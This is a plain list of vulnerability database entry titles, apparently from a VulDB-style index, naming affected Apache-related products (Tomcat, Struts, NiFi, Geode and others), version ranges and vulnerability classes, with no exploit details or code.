| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
| [113895] Apache Geode up to 1.3.x Code Execution
| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
| [113747] Apache Tomcat Servlets privilege escalation
| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
| [112885] Apache Allura up to 1.8.0 File information disclosure
| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
| [112625] Apache POI up to 3.16 Loop denial of service
| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
| [112339] Apache NiFi 1.5.0 Header privilege escalation
| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
| [112114] Oracle 9.1 Apache Log4j privilege escalation
| [112113] Oracle 9.1 Apache Log4j privilege escalation
| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
| [110701] Apache Fineract Query Parameter sql injection
| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
| [110106] Apache CXF Fediz Spring cross site request forgery
| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108938] Apple macOS up to 10.13.1 apache denial of service
| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108935] Apple macOS up to 10.13.1 apache denial of service
| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108931] Apple macOS up to 10.13.1 apache denial of service
| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108929] Apple macOS up to 10.13.1 apache denial of service
| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
| [108782] Apache Xerces2 XML Service denial of service
| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
| [108629] Apache OFBiz up to 10.04.01 privilege escalation
| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
5195| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
5196| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
| [107639] Apache NiFi 1.4.0 XML External Entity
| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
| [107197] Apache Xerces Jelly Parser XML File XML External Entity
| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
| [107084] Apache Struts up to 2.3.19 cross site scripting
| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
| [105878] Apache Struts up to 2.3.24.0 privilege escalation
| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
| [105643] Apache Pony Mail up to 0.8b weak authentication
| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
| [103690] Apache OpenMeetings 1.0.0 sql injection
| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
| [103688] Apache OpenMeetings 1.0.0 weak encryption
| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
| [103352] Apache Solr Node weak authentication
| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
| [102536] Apache Ranger up to 0.6 Stored cross site scripting
| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
| [99937] Apache Batik up to 1.8 privilege escalation
| [99936] Apache FOP up to 2.1 privilege escalation
| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
| [99930] Apache Traffic Server up to 6.2.0 denial of service
| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
| [117569] Apache Hadoop up to 2.7.3 privilege escalation
| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
| [99014] Apache Camel Jackson/JacksonXML privilege escalation
| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98605] Apple macOS up to 10.12.3 Apache denial of service
| [98604] Apple macOS up to 10.12.3 Apache denial of service
| [98603] Apple macOS up to 10.12.3 Apache denial of service
| [98602] Apple macOS up to 10.12.3 Apache denial of service
| [98601] Apple macOS up to 10.12.3 Apache denial of service
| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
| [98405] Apache Hadoop up to 0.23.10 privilege escalation
| [98199] Apache Camel Validation XML External Entity
| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
| [97081] Apache Tomcat HTTPS Request denial of service
| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
| [95311] Apache Storm UI Daemon privilege escalation
| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
| [94540] Apache Tika 1.9 tika-server File information disclosure
| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
| [93532] Apache Commons Collections Library Java privilege escalation
| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
| [93098] Apache Commons FileUpload privilege escalation
| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
| [92549] Apache Tomcat on Red Hat privilege escalation
| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
